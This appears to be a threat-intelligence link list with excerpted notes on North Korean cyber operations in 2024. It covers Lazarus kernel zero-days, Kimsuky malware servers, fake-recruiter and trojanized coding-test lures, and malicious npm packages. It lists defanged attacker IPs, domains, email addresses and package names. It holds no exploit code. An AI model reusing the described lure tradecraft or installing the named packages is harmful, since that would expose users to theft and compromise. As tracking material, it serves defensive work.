2024-01-11: Comprehensive Report on North Korean Hackers, Phishing Groups, and Money Laundering in 2023
2024-01-24: Funds Stolen from Crypto Platforms Fall More Than 50% in 2023, but Hacking Remains a Significant Threat as Number of Incidents Rises
- The vulnerability was introduced in Win10 1703 (RS2/15063) when the 0x22A018 IOCTL handler was first implemented. Older builds are not affected as they lack support for the vulnerable IOCTL. Interestingly, the Lazarus exploit bails out if it encounters a build older than Win10 1809 (RS5/17763), completely disregarding three perfectly vulnerable Windows versions.
- https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/
- https://www.csoonline.com/article/1311082/north-koreas-lazarus-deploys-rootkit-via-applocker-zero-day-flaw.html
2024-02-28: SquidSquad - Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram
- According to a cybersecurity company, the IP address of the Kimsuky server hosting this malware is 144.76.109.61 and the IP address of another, related server hosting the Kimsuky-controlled domain civilarys[.]store is 27.255.81.77. Kimsuky-related email accounts associated with this campaign include luckgpu[@]gmail.com and abdulsamee7561[@]gmail.com. The malicious applications were likely distributed via spearphishing or smishing.
2024-04-29: SquidSquad - How Lazarus Group laundered $200M from 25+ crypto hacks to fiat from 2020–2023
2024-05-16: DPRK IT - Thousands of North Koreans stole Americans’ identities and took remote-work tech jobs at Fortune 500 companies, DOJ says
- https://www.justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north
- https://archive.ph/nWug9
- https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-brazil
- North Korean Government-Backed Groups Targeting Brazil
- Since 2020, North Korean cyber actors have accounted for approximately a third of government-backed phishing activity targeting Brazil. North Korean government-backed actors have targeted the Brazilian government and Brazil’s aerospace, technology, and financial services sectors. Similar to their targeting interests in other regions, cryptocurrency and financial technology firms have been a particular focus, and at least three North Korean groups have targeted Brazilian cryptocurrency and fintech companies.
- In early 2024, PUKCHONG (UNC4899) targeted cryptocurrency professionals in multiple regions, including Brazil, using a Python app that was trojanized with malware. To deliver the malicious app, PUKCHONG reached out to targets via social media and sent a benign PDF containing a job description for an alleged job opportunity at a well known cryptocurrency firm. If the target replied with interest, PUKCHONG sent a second benign PDF with a skills questionnaire and instructions for completing a coding test. The instructions directed users to download and run a project hosted on GitHub. The project was a trojanized Python app for retrieving cryptocurrency prices that was modified to reach out to an attacker-controlled domain to retrieve a second stage payload if specific conditions were met.
- North Korean government-backed groups have also in the past targeted Brazil’s aerospace and defense industry. In one example, PAEKTUSAN created an account impersonating an HR director at a Brazilian aerospace firm and used it to send phishing emails to employees at a second Brazilian aerospace firm. In a separate campaign, PAEKTUSAN masqueraded as a recruiter at a major US aerospace company and reached out to professionals in Brazil and other regions via email and social media about prospective job opportunities. Google blocked the emails, which contained malicious links to a DOCX file containing a job posting lure that dropped AGAMEMNON, a downloader written in C++. The attacker also likely attempted to deliver the malware via messages on social media and chat applications like WhatsApp. The campaigns were consistent with Operation Dream Job and activity previously described by Google. In both campaigns, we also sent users government-backed attacker alerts notifying them of the activity and sharing information about how to keep their accounts safe.
- One North Korean group, PRONTO, concentrates on targeting diplomats globally, and their targets in Brazil follow this pattern. In one case, Google blocked a campaign that used a denuclearization-themed phishing lure and the group’s typical phishing kit - a fake PDF viewer that presents the users with a login prompt to enter their credentials in order to view the lure document. In another case, PRONTO used North Korea news-themed lures to direct diplomatic targets to credential harvesting pages.
- One of the emerging trends we are witnessing globally from North Korean threat activity today is the insider threat posed by North Korean nationals gaining employment surreptitiously at corporations to conduct work in various IT roles. Though we have not yet observed direct connections between any of these North Korean IT workers and Brazilian enterprises, we note the potential for it to present a future risk given the growing startup ecosystem in Brazil, historical activity by North Korean threat actors in Brazil, and expansiveness of this problem.
- https://thehackernews.com/2024/08/north-korean-hackers-target-developers.html
- https://blog.phylum.io/north-korea-still-attacking-developers-via-npm/
- mirotalk[.]net
- ipcheck[.]cloud
- 45[.]61[.]158[.]14
- 167[.]88[.]36[.]13
- 95[.]164[.]17[.]24
- qq-console
- sass-notification
- helmet-validate
- ethersscan-api
- telegram-con
- temp-etherscan-api
- https://www.microsoft.com/en-us/security/blog/2024/08/30/north-korean-threat-actor-citrine-sleet-exploiting-chromium-zero-day/
- https://www.bleepingcomputer.com/news/security/north-korean-hackers-exploit-chrome-zero-day-to-deploy-rootkit/
- voyagorclub[.]space
- https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-7971
- https://nvd.nist.gov/vuln/detail/CVE-2024-4947
- https://nvd.nist.gov/vuln/detail/CVE-2024-5274
- https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf
- https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf
- https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/